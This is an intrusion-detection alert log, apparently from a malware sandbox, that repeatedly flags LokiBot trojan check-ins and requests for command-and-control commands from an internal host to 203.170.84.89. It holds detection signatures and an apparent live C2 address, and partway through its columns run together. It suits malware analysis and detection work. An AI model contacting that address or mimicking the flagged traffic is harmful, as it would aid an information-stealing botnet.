                                          02/22/21-19:13:09.379899  TCP       2025381  ET TROJAN LokiBot Checkin                                                49752        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:10.753898  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49753        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:10.753898  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49753        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:10.753898  TCP       2025381  ET TROJAN LokiBot Checkin                                                49753        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:12.128792  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49754        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:12.128792  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49754        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:12.128792  TCP       2025381  ET TROJAN LokiBot Checkin                                                49754        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:13.445902  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49755        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:13.445902  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49755        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:13.445902  TCP       2025381  ET TROJAN LokiBot Checkin                                                49755        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:14.755155  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49756        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:14.755155  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49756        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:14.755155  TCP       2025381  ET TROJAN LokiBot Checkin                                                49756        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:16.098574  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49757        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:16.098574  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49757        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:16.098574  TCP       2025381  ET TROJAN LokiBot Checkin                                                49757        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:17.407438  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49758        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:17.407438  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49758        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:17.407438  TCP       2025381  ET TROJAN LokiBot Checkin                                                49758        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:18.738997  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49759        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:18.738997  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49759        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:18.738997  TCP       2025381  ET TROJAN LokiBot Checkin                                                49759        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:20.041935  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49760        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:20.041935  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49760        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:20.041935  TCP       2025381  ET TROJAN LokiBot Checkin                                                49760        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:21.333542  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49763        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:21.333542  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49763        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:21.333542  TCP       2025381  ET TROJAN LokiBot Checkin                                                49763        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:22.669300  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49764        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:22.669300  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49764        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:22.669300  TCP       2025381  ET TROJAN LokiBot Checkin                                                49764        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:24.013553  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49765        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:24.013553  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49765        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:24.013553  TCP       2025381  ET TROJAN LokiBot Checkin                                                49765        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:25.353621  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49766        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:25.353621  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49766        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:25.353621  TCP       2025381  ET TROJAN LokiBot Checkin                                                49766        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:26.968743  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49767        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:26.968743  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49767        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:26.968743  TCP       2025381  ET TROJAN LokiBot Checkin                                                49767        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:28.278128  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49768        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:28.278128  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49768        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:28.278128  TCP       2025381  ET TROJAN LokiBot Checkin                                                49768        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:29.579659  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49769        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:29.579659  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49769        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:29.579659  TCP       2025381  ET TROJAN LokiBot Checkin                                                49769        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:30.894738  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49770        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:30.894738  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49770        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:30.894738  TCP       2025381  ET TROJAN LokiBot Checkin                                                49770        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:32.184419  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49771        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:32.184419  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49771        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:32.184419  TCP       2025381  ET TROJAN LokiBot Checkin                                                49771        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:33.518152  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49772        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:33.518152  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49772        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:33.518152  TCP       2025381  ET TROJAN LokiBot Checkin                                                49772        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:34.813981  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49773        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:34.813981  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49773        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:34.813981  TCP       2025381  ET TROJAN LokiBot Checkin                                                49773        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:36.095387  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49774        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:36.095387  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49774        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:36.095387  TCP       2025381  ET TROJAN LokiBot Checkin                                                49774        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:37.374892  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49777        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:37.374892  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49777        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:37.374892  TCP       2025381  ET TROJAN LokiBot Checkin                                                49777        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:38.688701  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49781        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:38.688701  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49781        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:38.688701  TCP       2025381  ET TROJAN LokiBot Checkin                                                49781        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:39.984082  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49784        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:39.984082  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49784        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:39.984082  TCP       2025381  ET TROJAN LokiBot Checkin                                                49784        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:41.300879  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49788        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:41.300879  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49788        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:41.300879  TCP       2025381  ET TROJAN LokiBot Checkin                                                49788        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:42.586767  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49790        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:42.586767  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49790        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:42.586767  TCP       2025381  ET TROJAN LokiBot Checkin                                                49790        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:43.872010  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49792        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:43.872010  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49792        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:43.872010  TCP       2025381  ET TROJAN LokiBot Checkin                                                49792        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:45.134992  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49793        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:45.134992  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49793        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:45.134992  TCP       2025381  ET TROJAN LokiBot Checkin                                                49793        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:46.448703  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49794        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:46.448703  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49794        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:46.448703TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.4203.170.84.89
                                          02/22/21-19:13:47.761299TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.4203.170.84.89
                                          02/22/21-19:13:47.761299TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.4203.170.84.89
                                          02/22/21-19:13:47.761299TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.4203.170.84.89
                                          02/22/21-19:13:49.047258TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.4203.170.84.89
                                          02/22/21-19:13:49.047258TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.4203.170.84.89
                                          02/22/21-19:13:49.047258TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.4203.170.84.89
                                          02/22/21-19:13:50.324886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.4203.170.84.89
                                          02/22/21-19:13:50.324886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.4203.170.84.89
                                          02/22/21-19:13:50.324886TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.4203.170.84.89
                                          02/22/21-19:13:51.622676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.4203.170.84.89
                                          02/22/21-19:13:51.622676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.4203.170.84.89
                                          02/22/21-19:13:51.622676TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.4203.170.84.89
                                          02/22/21-19:13:52.940189TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.4203.170.84.89
                                          02/22/21-19:13:52.940189TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.4203.170.84.89
                                          02/22/21-19:13:52.940189TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.4203.170.84.89
                                          02/22/21-19:13:54.217316TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.4203.170.84.89
                                          02/22/21-19:13:54.217316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.4203.170.84.89
                                          02/22/21-19:13:54.217316TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.4203.170.84.89
                                          02/22/21-19:13:55.493778TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.4203.170.84.89
                                          02/22/21-19:13:55.493778TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.4203.170.84.89
                                          02/22/21-19:13:55.493778TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.4203.170.84.89
                                          02/22/21-19:13:56.763032TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.4203.170.84.89
                                          02/22/21-19:13:56.763032TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.4203.170.84.89
                                          02/22/21-19:13:56.763032TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.4203.170.84.89
                                          02/22/21-19:13:58.050742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.4203.170.84.89
                                          02/22/21-19:13:58.050742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.4203.170.84.89
                                          02/22/21-19:13:58.050742TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.4203.170.84.89
                                          02/22/21-19:13:59.321820TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.4203.170.84.89
                                          02/22/21-19:13:59.321820TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.4203.170.84.89
                                          02/22/21-19:13:59.321820TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.4203.170.84.89
                                          02/22/21-19:14:00.631942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.4203.170.84.89
                                          02/22/21-19:14:00.631942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.4203.170.84.89
                                          02/22/21-19:14:00.631942TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.4203.170.84.89
                                          02/22/21-19:14:01.922836TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.4203.170.84.89
                                          02/22/21-19:14:01.922836TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.4203.170.84.89
                                          02/22/21-19:14:01.922836TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.4203.170.84.89
                                          02/22/21-19:14:03.230296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.4203.170.84.89
                                          02/22/21-19:14:03.230296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.4203.170.84.89
                                          02/22/21-19:14:03.230296TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.4203.170.84.89
                                          02/22/21-19:14:04.508068TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.4203.170.84.89
                                          02/22/21-19:14:04.508068TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.4203.170.84.89
                                          02/22/21-19:14:04.508068TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.4203.170.84.89
                                          02/22/21-19:14:05.814223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.4203.170.84.89
                                          02/22/21-19:14:05.814223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.4203.170.84.89
                                          02/22/21-19:14:05.814223TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.4203.170.84.89
                                          02/22/21-19:14:07.112781TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.4203.170.84.89
                                          02/22/21-19:14:07.112781TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.4203.170.84.89
                                          02/22/21-19:14:07.112781TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.4203.170.84.89
                                          02/22/21-19:14:08.413653TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.4203.170.84.89
                                          02/22/21-19:14:08.413653TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.4203.170.84.89
                                          02/22/21-19:14:08.413653TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.4203.170.84.89
                                          02/22/21-19:14:09.712194TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.4203.170.84.89
                                          02/22/21-19:14:09.712194TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.4203.170.84.89
                                          02/22/21-19:14:09.712194TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.4203.170.84.89
                                          02/22/21-19:14:11.002003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.4203.170.84.89
                                          02/22/21-19:14:11.002003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.4203.170.84.89
                                          02/22/21-19:14:11.002003TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.4203.170.84.89
                                          02/22/21-19:14:12.313270TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.4203.170.84.89
                                          02/22/21-19:14:12.313270TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.4203.170.84.89
                                          02/22/21-19:14:12.313270TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.4203.170.84.89
                                          02/22/21-19:14:13.908883TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.4203.170.84.89
                                          02/22/21-19:14:13.908883TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.4203.170.84.89
                                          02/22/21-19:14:13.908883TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.4203.170.84.89
                                          02/22/21-19:14:15.437535TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.4203.170.84.89
                                          02/22/21-19:14:15.437535TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.4203.170.84.89
                                          02/22/21-19:14:15.437535TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.4203.170.84.89
                                          02/22/21-19:14:16.710648TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.4203.170.84.89
                                          02/22/21-19:14:16.710648TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.4203.170.84.89
                                          02/22/21-19:14:16.710648TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.4203.170.84.89
                                          02/22/21-19:14:18.024684TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.4203.170.84.89
                                          02/22/21-19:14:18.024684TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.4203.170.84.89
                                          02/22/21-19:14:18.024684TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.4203.170.84.89
                                          02/22/21-19:14:19.321868TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.4203.170.84.89
                                          02/22/21-19:14:19.321868TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.4203.170.84.89
                                          02/22/21-19:14:19.321868TCP2025381ET TROJAN LokiBot Checkin4982780192.168.2.4203.170.84.89
                                          02/22/21-19:14:20.599287TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.4203.170.84.89
                                          02/22/21-19:14:20.599287TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.4203.170.84.89
                                          02/22/21-19:14:20.599287TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.4203.170.84.89
                                          02/22/21-19:14:21.882521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.4203.170.84.89
                                          02/22/21-19:14:21.882521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.4203.170.84.89
                                          02/22/21-19:14:21.882521TCP2025381ET TROJAN LokiBot Checkin4982980192.168.2.4203.170.84.89
                                          02/22/21-19:14:23.176365TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.4203.170.84.89
                                          02/22/21-19:14:23.176365TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.4203.170.84.89
                                          02/22/21-19:14:23.176365TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.4203.170.84.89
                                          02/22/21-19:14:24.482440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983180192.168.2.4203.170.84.89
                                          02/22/21-19:14:24.482440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983180192.168.2.4203.170.84.89
                                          02/22/21-19:14:24.482440TCP2025381ET TROJAN LokiBot Checkin4983180192.168.2.4203.170.84.89
                                          02/22/21-19:14:25.733888TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.4203.170.84.89
                                          02/22/21-19:14:25.733888TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.4203.170.84.89
                                          02/22/21-19:14:25.733888TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.4203.170.84.89
                                          02/22/21-19:14:27.016301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.4203.170.84.89
                                          02/22/21-19:14:27.016301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.4203.170.84.89
                                          02/22/21-19:14:27.016301TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.4203.170.84.89
                                          02/22/21-19:14:28.298521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.4203.170.84.89
                                          02/22/21-19:14:28.298521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.4203.170.84.89
                                          02/22/21-19:14:28.298521TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.4203.170.84.89
                                          02/22/21-19:14:29.542203TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.2.4203.170.84.89
                                          02/22/21-19:14:29.542203TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.2.4203.170.84.89
                                          02/22/21-19:14:29.542203TCP2025381ET TROJAN LokiBot Checkin4983580192.168.2.4203.170.84.89
                                          02/22/21-19:14:30.810538TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.4203.170.84.89
                                          02/22/21-19:14:30.810538TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.4203.170.84.89
                                          02/22/21-19:14:30.810538TCP2025381ET TROJAN LokiBot Checkin4983780192.168.2.4203.170.84.89
                                          02/22/21-19:14:32.137483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.2.4203.170.84.89
                                          02/22/21-19:14:32.137483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.2.4203.170.84.89
                                          02/22/21-19:14:32.137483TCP2025381ET TROJAN LokiBot Checkin4983980192.168.2.4203.170.84.89
                                          02/22/21-19:14:33.411950TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.4203.170.84.89
                                          02/22/21-19:14:33.411950TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.4203.170.84.89
                                          02/22/21-19:14:33.411950TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.4203.170.84.89
                                          02/22/21-19:14:34.725026TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.4203.170.84.89
                                          02/22/21-19:14:34.725026TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.4203.170.84.89
                                          02/22/21-19:14:34.725026TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.4203.170.84.89
                                          02/22/21-19:14:36.028479TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.4203.170.84.89
                                          02/22/21-19:14:36.028479TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.4203.170.84.89
                                          02/22/21-19:14:36.028479TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.4203.170.84.89
                                          02/22/21-19:14:37.334442TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.4203.170.84.89
                                          02/22/21-19:14:37.334442TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.4203.170.84.89
                                          02/22/21-19:14:37.334442TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.4203.170.84.89
                                          02/22/21-19:14:38.623262TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.4203.170.84.89
                                          02/22/21-19:14:38.623262TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.4203.170.84.89
                                          02/22/21-19:14:38.623262TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.4203.170.84.89
                                          02/22/21-19:14:39.953346TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.4203.170.84.89
                                          02/22/21-19:14:39.953346TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.4203.170.84.89
                                          02/22/21-19:14:39.953346TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.4203.170.84.89
                                          02/22/21-19:14:41.267887TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.4203.170.84.89
                                          02/22/21-19:14:41.267887TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.4203.170.84.89
                                          02/22/21-19:14:41.267887TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.4203.170.84.89
                                          02/22/21-19:14:42.561340TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.2.4203.170.84.89
                                          02/22/21-19:14:42.561340TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.2.4203.170.84.89
                                          02/22/21-19:14:42.561340TCP2025381ET TROJAN LokiBot Checkin4984780192.168.2.4203.170.84.89
                                          02/22/21-19:14:43.857917TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.2.4203.170.84.89
                                          02/22/21-19:14:43.857917TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.2.4203.170.84.89
                                          02/22/21-19:14:43.857917TCP2025381ET TROJAN LokiBot Checkin4984880192.168.2.4203.170.84.89
                                          02/22/21-19:14:45.133832TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.2.4203.170.84.89
                                          02/22/21-19:14:45.133832TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.2.4203.170.84.89
                                          02/22/21-19:14:45.133832TCP2025381ET TROJAN LokiBot Checkin4984980192.168.2.4203.170.84.89
                                          02/22/21-19:14:46.440406TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.4203.170.84.89
                                          02/22/21-19:14:46.440406TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.4203.170.84.89
                                          02/22/21-19:14:46.440406TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.4203.170.84.89
                                          02/22/21-19:14:47.730697TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.4203.170.84.89
